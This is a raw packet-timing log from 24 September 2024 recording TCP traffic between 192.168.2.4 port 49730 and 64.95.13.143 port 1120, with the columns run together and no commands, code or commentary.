Sep 24, 2024 17:46:11.758527994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.758538961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.758572102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.759392977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759401083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759406090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759412050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759422064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759428024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759439945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759444952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759449959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759454012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.759491920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.759491920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.760296106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760303020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760333061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760338068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760343075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760348082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760360956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760365963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760373116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.760376930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760384083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760385990 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.760390043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.760416031 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.760436058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.761212111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761219025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761229992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761235952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761241913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761253119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761257887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761265039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.761267900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761275053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761286020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761291027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761295080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.761332035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.761984110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.761990070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762001038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762006998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762012005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762023926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762029886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762034893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762039900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762042046 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.762044907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762056112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762058973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.762062073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762072086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762078047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762088060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762089968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.762244940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.762244940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.762831926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762839079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762850046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762856007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762860060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.762897015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.819164038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819195032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819201946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819281101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.819561005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819566965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819577932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819583893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.819617033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.846180916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846201897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846209049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846219063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846225023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846235991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846241951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.846375942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.846375942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.846436977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.848948002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849067926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849073887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849078894 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849117994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849191904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849198103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849209070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849215031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849241972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849260092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849412918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849419117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849431038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849466085 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849508047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849514961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849526882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849533081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849538088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849550009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.849560022 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.849575996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.850287914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850294113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850308895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850313902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850326061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850332022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850342035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.850347996 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.850378990 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.851186991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851193905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851198912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851210117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851212978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851222038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851226091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851232052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851233959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851234913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.851236105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.851255894 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.851273060 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.852149963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852157116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852168083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852173090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852178097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852184057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852195024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852200031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852205992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852206945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.852211952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.852225065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.852246046 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.853224993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853230953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853241920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853246927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853251934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853262901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853267908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853272915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853282928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853287935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853290081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.853293896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.853321075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.854063034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854068995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854079962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854084969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854089975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854094982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854105949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854110956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854114056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.854115963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854121923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854135990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854140997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854142904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.854150057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854155064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.854161024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.854195118 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.855091095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855098963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855101109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855104923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855108023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855113983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855119944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855124950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855130911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855135918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855146885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855151892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855151892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.855159998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855171919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855171919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.855187893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.855933905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855941057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855952024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855957031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855962038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855967999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855978012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855983019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855988026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.855997086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.855998039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856004953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856017113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856021881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856028080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.856031895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856040001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.856053114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.856065989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.911817074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911827087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911839008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911900997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911906958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911912918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911920071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.911933899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.911981106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.912147999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.912224054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.940979958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.940992117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941061020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.941102982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941270113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941282034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941325903 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.941450119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941461086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.941497087 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.943991899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.943999052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944047928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944128036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944140911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944185972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944293976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944308043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944323063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944329023 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944348097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944372892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944547892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944557905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944569111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944580078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944598913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944616079 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.944710970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.944859982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945051908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945230961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945236921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945251942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945260048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945270061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945275068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945280075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945308924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945308924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945323944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945738077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945744991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945755005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945794106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945919037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945935965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945946932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945956945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945962906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945976019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.945977926 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.945981979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946011066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.946023941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.946760893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946770906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946782112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946788073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946794033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946799040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946810007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946815014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946820021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946821928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.946831942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.946844101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.946894884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.947699070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947714090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947762012 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.947870970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947881937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947889090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947906017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947917938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947923899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947936058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947936058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.947945118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.947989941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.948390961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.948847055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948858976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948870897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948878050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948884964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948890924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948895931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948900938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948906898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948906898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.948920012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.948929071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.948951006 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.948964119 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.949609041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949616909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949631929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949661016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.949812889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949822903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949834108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949839115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949845076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949850082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949860096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949865103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.949867964 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.949899912 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.949913979 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.949969053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950047016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.950488091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950494051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950510025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950515032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950525045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950536966 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.950567007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.950681925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950694084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950705051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950710058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950721025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950727940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.950736046 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.950757027 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.950767994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951101065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951145887 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951312065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951323986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951329947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951335907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951340914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951348066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951359034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951359987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951373100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951400995 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951437950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951461077 CEST11204973064.95.13.143192.168.2.4
